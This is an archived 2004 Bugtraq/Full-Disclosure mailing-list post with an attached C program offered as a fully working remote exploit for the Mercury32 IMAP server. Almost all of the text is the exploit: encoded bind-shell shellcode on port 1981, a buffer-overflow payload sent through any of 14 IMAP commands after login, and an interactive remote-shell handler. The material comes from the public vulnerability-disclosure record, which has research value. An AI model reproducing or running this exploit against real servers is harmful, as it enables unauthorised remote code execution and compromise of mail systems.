[37586] in bugtraq
Remote Mercury32 Imap exploit
daemon@ATHENA.MIT.EDU (JohnH)
Thu Dec 2 21:45:32 2004
Message-ID: <007701c4d7fd$937829c0$9b01a8c0@server>
From: "JohnH" <johnh@secnetops.com>
To: <full-disclosure@lists.netsys.com>
Cc: <bugtraq@securityfocus.com>
Date: Wed, 1 Dec 2004 18:29:17 -0500
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0074_01C4D7D3.AA809000"
This is a multi-part message in MIME format.
------=_NextPart_000_0074_01C4D7D3.AA809000
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
Here you go guys. A fully working Remote Mercury32 Imap exploit. This will
work on any windows OS. 100% universal. And now it has 14 possible targets.
Again, Someone posted some dos code :(
Cheers,
Johnh@secnetops.com
Security Researcher
VISIT: www.secnetops.com
------=_NextPart_000_0074_01C4D7D3.AA809000
Content-Type: application/octet-stream;
name="ex_MERCURY2.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="ex_MERCURY2.c"
/** Remote Mercury32 Imap exploit [14 types of attacks] WOW!=0A=
** By: JohnH@secnetops.com=0A=
**=0A=
** Notes: Second public release and both of them are murcury32 ;) =0A=
** Again someone posted some dos code :( why bother?=0A=
** If you spent the time to look, it uses the same buffer for =
all 14 types of attacks and the size does not =0A=
** change. I did not check the asm but its prob using the same =
routine for all 14 commands.=0A=
**=0A=
** Date: 12/01/04=0A=
**/=0A=
=0A=
#include <stdio.h>=0A=
#include <unistd.h>=0A=
#include <sys/types.h>=0A=
#include <sys/socket.h>=0A=
#include <netinet/in.h>=0A=
#include <netinet/tcp.h>=0A=
#include <arpa/inet.h>=0A=
#include <netdb.h>=0A=
#include <stdlib.h>=0A=
#include <errno.h>=0A=
#include <string.h>=0A=
#include <assert.h>=0A=
#include <fcntl.h>=0A=
#include <sys/time.h>=0A=
=0A=
#define version "1.0"=0A=
int usage(char *p);=0A=
=0A=
=0A=
char sc_bind[] =3D=0A=
//decoder=0A=
"\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"=0A=
"\x05\xE8\xEC\xFF\xFF\xFF"=0A=
//sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s=0A=
//XOR with 0x96 (267 0x10B bytes)=0A=
"\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"=0A=
"\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"=0A=
"\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"=0A=
"\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"=0A=
"\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"=0A=
"\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"=0A=
"\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"=0A=
"\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"=0A=
"\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"=0A=
"\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"=0A=
"\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"=0A=
"\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"=0A=
"\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"=0A=
"\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"=0A=
"\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"=0A=
"\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"=0A=
"\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"=0A=
//decoder end sign=0A=
"\x45\x59\x34\x53";=0A=
=0A=
int type;=0A=
int iPort=3D143;=0A=
char *ip=3DNULL;=0A=
char username[256];=0A=
char password[256];=0A=
=0A=
int main(int argc, char **argv)=0A=
{=0A=
int c;=0A=
=0A=
=0A=
if(argc < 2)=0A=
{=0A=
usage(argv[0]);=0A=
return 0;=0A=
}=0A=
=0A=
=0A=
while((c =3D getopt(argc, argv, "u:P:h:p:t:")) !=3D EOF) {=0A=
switch(c) {=0A=
=0A=
case 'u':=0A=
strncpy(username, optarg, sizeof (username) - 1);=0A=
break;=0A=
=0A=
case 'P':=0A=
strncpy(password, optarg, sizeof (password) - 1);=0A=
break;=0A=
=0A=
case 'h':=0A=
ip=3Doptarg;=0A=
break;=0A=
case 'p':=0A=
iPort=3Datoi(optarg);=0A=
break;=0A=
case 't':=0A=
type=3Datoi(optarg);=0A=
break;=0A=
default:=0A=
usage (argv[0]);=0A=
return 0;=0A=
}=0A=
}=0A=
=0A=
=0A=
if((!ip))=0A=
{=0A=
usage(argv[0]);=0A=
printf("[-] Invalid parameter.\n");=0A=
return 0;=0A=
}=0A=
=0A=
SendExploit();=0A=
return 0;=0A=
}=0A=
=0A=
/* ripped from TESO code */=0A=
void shell (int sock)=0A=
{=0A=
int l;=0A=
char buf[512];=0A=
fd_set rfds;=0A=
=0A=
=0A=
while (1) {=0A=
FD_SET (0, &rfds);=0A=
FD_SET (sock, &rfds);=0A=
select (sock + 1, &rfds, NULL, NULL, NULL);=0A=
if (FD_ISSET (0, &rfds)) {=0A=
l =3D read (0, buf, sizeof (buf));=0A=
if (l <=3D 0) {=0A=
printf("\n - Connection closed by local user\n");=0A=
exit (EXIT_FAILURE);=0A=
}=0A=
write (sock, buf, l);=0A=
}=0A=
=0A=
if (FD_ISSET (sock, &rfds)) {=0A=
l =3D read (sock, buf, sizeof (buf));=0A=
if (l =3D=3D 0) {=0A=
printf ("\n - Connection closed by remote host.\n");=0A=
exit (EXIT_FAILURE);=0A=
} else if (l < 0) {=0A=
printf ("\n - Read failure\n");=0A=
exit (EXIT_FAILURE);=0A=
}=0A=
write (1, buf, l);=0A=
}=0A=
}=0A=
}=0A=
=0A=
int SendExploit()=0A=
{=0A=
struct hostent *he;=0A=
struct in_addr in;=0A=
struct sockaddr_in peer;=0A=
int iErr, s,s2;=0A=
int x;=0A=
char buffer[9000];=0A=
char buffer2[9000];=0A=
char szRecvBuff[0x1000];=0A=
char *ip2=3DNULL;=0A=
=0A=
printf( "MERCURY32 Imap exploit\n");=0A=
printf( "By: JohnH@secnetops.com\n");=0A=
printf("[+] Entering God Mode\n");=0A=
=0A=
// Login=0A=
memset(buffer2,0x0,sizeof(buffer2));=0A=
strcat(buffer2,"a001 LOGIN ");=0A=
strcat(buffer2,username);=0A=
strcat(buffer2," ");=0A=
strcat(buffer2,password);=0A=
strcat(buffer2,"\n");=0A=
=0A=
bzero (buffer,sizeof(buffer));=0A=
printf("[+] Using type: %d\n",type);=0A=
if (type =3D=3D 0)=0A=
strcat(buffer,"a001 EXAMINE ");=0A=
else if(type =3D=3D 1)=0A=
strcat(buffer,"a001 SUBSCRIBE ");=0A=
else if(type =3D=3D 2)=0A=
strcat(buffer,"a001 STATUS ");=0A=
else if(type =3D=3D 3)=0A=
strcat(buffer,"a001 APPEND ");=0A=
else if(type =3D=3D 4)=0A=
strcat(buffer,"a001 CHECK ");=0A=
else if(type =3D=3D 5)=0A=
strcat(buffer,"a001 CLOSE ");=0A=
else if(type =3D=3D 6)=0A=
strcat(buffer,"a001 EXPUNGE ");=0A=
else if(type =3D=3D 7)=0A=
strcat(buffer,"a001 FETCH ");=0A=
else if(type =3D=3D 8)=0A=
strcat(buffer,"a001 RENAME ");=0A=
else if(type =3D=3D 9)=0A=
strcat(buffer,"a001 DELETE ");=0A=
else if(type =3D=3D 10)=0A=
strcat(buffer,"a001 LIST ");=0A=
else if(type =3D=3D 11)=0A=
strcat(buffer,"a001 SEARCH ");=0A=
else if(type =3D=3D 12)=0A=
strcat(buffer,"a001 CREATE ");=0A=
else if(type =3D=3D 13)=0A=
strcat(buffer,"a001 UNSUBSCRIBE ");=0A=
else if(type =3D=3D 14)=0A=
strcat(buffer,"a001 SELECT ");=0A=
=0A=
=0A=
=0A=
x =3D strlen(buffer);=0A=
memset(buffer+x,0x41,260);=0A=
x+=3D260;=0A=
*(unsigned int *)&buffer[x] =3D 0x01f9c8fa;=0A=
x+=3D4;=0A=
memset(buffer+x,0x90,100);=0A=
x+=3D100;=0A=
memcpy (buffer+x, sc_bind, strlen(sc_bind));=0A=
x+=3Dstrlen(sc_bind);=0A=
memcpy(buffer+x,"\r\n",2);=0A=
x+=3D2;=0A=
=0A=
=0A=
if (!(he =3D gethostbyname(ip)))=0A=
{=0A=
herror("Resolving host");=0A=
exit(EXIT_FAILURE);=0A=
}=0A=
in.s_addr =3D *((unsigned int *)he->h_addr);=0A=
peer.sin_family =3D AF_INET;=0A=
peer.sin_port =3D htons(iPort);=0A=
peer.sin_addr.s_addr =3D inet_addr(ip);=0A=
s =3D socket(AF_INET, SOCK_STREAM, 0);=0A=
if (s < 0)=0A=
{=0A=
perror("socket");=0A=
return(0);=0A=
}=0A=
if (connect(s, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) =
< 0)=0A=
=0A=
{=0A=
perror("connect");=0A=
return(0);=0A=
}=0A=
printf("[+] connect to %s:%d success.\n", ip, iPort);=0A=
sleep(3);=0A=
=0A=
memset(szRecvBuff, 0, sizeof(szRecvBuff));=0A=
iErr =3D send(s, buffer2, strlen(buffer2),0);=0A=
printf("[+] Sent: %d\n", iErr);=0A=
=0A=
iErr =3D send(s, buffer, x,0);=0A=
=0A=
printf("[+] Sent: %d\n", iErr);=0A=
=0A=
printf("[+] Wait for shell.\n");=0A=
if (!(he =3D gethostbyname(ip)))=0A=
{=0A=
herror("Resolving host");=0A=
exit(EXIT_FAILURE);=0A=
}=0A=
in.s_addr =3D *((unsigned int *)he->h_addr);=0A=
ip2 =3D in.s_addr;=0A=
=0A=
sleep(5);=0A=
peer.sin_family =3D AF_INET;=0A=
peer.sin_port =3D htons(1981);=0A=
peer.sin_addr.s_addr =3D ip2;=0A=
s2 =3D socket(AF_INET, SOCK_STREAM, 0);=0A=
if (s2 < 0)=0A=
{=0A=
perror("socket");=0A=
exit(EXIT_FAILURE);=0A=
}=0A=
=0A=
if (connect(s2, (struct sockaddr *)&peer, sizeof(struct =
sockaddr_in)) < 0)=0A=
{=0A=
perror("connect");=0A=
return(0);=0A=
}=0A=
printf ("[+] We got a shell \n");=0A=
=0A=
shell(s2);=0A=
=0A=
=0A=
return 0;=0A=
=0A=
}=0A=
=0A=
int usage(char *p)=0A=
{=0A=
printf("MERCURY32 Imap Remote Exploit\n");=0A=
printf("By: JohnH@secnetops.com\n");=0A=
printf( "Usage: %s <-u username> <-p password> <-h host> <-p port> =
<-t type>\n",p);=0A=
printf("Possible types: Look in source code too lazy to type out 14 =
types\n");=0A=
exit(0);=0A=
}=0A=
=0A=
=0A=
------=_NextPart_000_0074_01C4D7D3.AA809000--
